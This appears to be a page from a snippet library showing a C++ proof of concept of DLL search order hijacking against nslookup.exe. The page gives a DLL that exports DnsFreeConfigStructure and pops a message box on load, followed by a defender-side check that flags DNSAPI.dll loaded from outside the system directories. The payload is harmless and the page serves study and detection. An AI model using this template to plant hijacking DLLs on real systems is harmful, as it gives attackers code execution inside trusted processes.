Windows C++ / Hijack Execution Flow: DLL Search Order Hijacking

Author: Sh0ckFR
Platform: Windows
Language: C++
Technique: Hijack Execution Flow: DLL Search Order Hijacking

Description:

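Proof of concept of DLL Search Order Hijacking against the executable nslookup.exe, via the DnsFreeConfigStructure function of the DLL DNSAPI.dll. The DLL below exports a function with that name and displays a message box when it is loaded into the process and when the export is called.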

Code

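#include <windows.h>

// Payload of the proof of concept: a message box that makes the load visible.
// Declared with the thread-start signature so CreateThread needs no cast.
DWORD WINAPI Main(LPVOID lpParameter) {
    UNREFERENCED_PARAMETER(lpParameter);
    MessageBoxW(0, L"DLL Search Order Hijacking is present", L"DLL Search Order Hijacking", 0);
    return 1;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Show the message box on its own thread so DllMain does not block
        // while the loader lock is held.
        HANDLE hThread = CreateThread(NULL, 0, Main, NULL, 0, NULL);
        if (hThread != NULL)
            CloseHandle(hThread); // the thread keeps running; only the handle is released
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Export carrying the name of the DNSAPI.dll function given in the description.
// extern "C" keeps the exported name unmangled when the file is compiled as C++.
extern "C" __declspec(dllexport) void DnsFreeConfigStructure() { Main(NULL); }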
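
Detection

A defender-side check for the condition this snippet demonstrates, added here as an example and not part of the author's code: it scans image-load records and flags any DNSAPI.dll loaded from outside the Windows system directories. The ImageLoad record layout, the function names, the sample paths and the C:\Windows install location are assumptions.

```cpp
// Added example, not the author's code. Record layout and sample paths are constructed.
#include <algorithm>
#include <cctype>
#include <iostream>
#include <iterator>
#include <string>
#include <vector>

struct ImageLoad {        // hypothetical image-load record (process path, loaded DLL path)
    std::string process;
    std::string module;
};

// Lower-case and unify separators so comparisons ignore case and slash style.
static std::string normalize(std::string p) {
    std::transform(p.begin(), p.end(), p.begin(), [](unsigned char c) {
        return c == '/' ? '\\' : static_cast<char>(std::tolower(c));
    });
    return p;
}

// True when the watched DLL name is loaded from outside the system directories.
bool isSuspiciousLoad(const ImageLoad& ev, const std::string& watched = "dnsapi.dll") {
    const std::string mod = normalize(ev.module);
    const auto cut = mod.find_last_of('\\');
    if (cut == std::string::npos) return false;          // no directory part: cannot judge
    if (mod.substr(cut + 1) != normalize(watched)) return false;
    const std::string dir = mod.substr(0, cut);
    // Assumption: Windows is installed in C:\Windows (32- and 64-bit system directories).
    return dir != "c:\\windows\\system32" && dir != "c:\\windows\\syswow64";
}

std::vector<ImageLoad> findHijackCandidates(const std::vector<ImageLoad>& events) {
    std::vector<ImageLoad> hits;
    std::copy_if(events.begin(), events.end(), std::back_inserter(hits),
                 [](const ImageLoad& e) { return isSuspiciousLoad(e); });
    return hits;
}

int main() {
    const std::vector<ImageLoad> sample = {              // constructed records
        {"C:\\Windows\\System32\\nslookup.exe", "C:\\Windows\\System32\\DNSAPI.dll"},
        {"D:\\lab\\nslookup.exe", "D:\\lab\\DNSAPI.dll"},
        {"C:\\Windows\\System32\\nslookup.exe", "C:\\Windows\\System32\\kernel32.dll"},
    };
    for (const auto& e : findHijackCandidates(sample))
        std::cout << "ALERT " << e.process << " loaded " << e.module << "\n";
    return 0;
}
```

A path that reaches a system directory through "." or ".." segments is flagged as well, because the directory is compared as a string rather than resolved.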

Created

July 25, 2022

Last Revised

April 22, 2024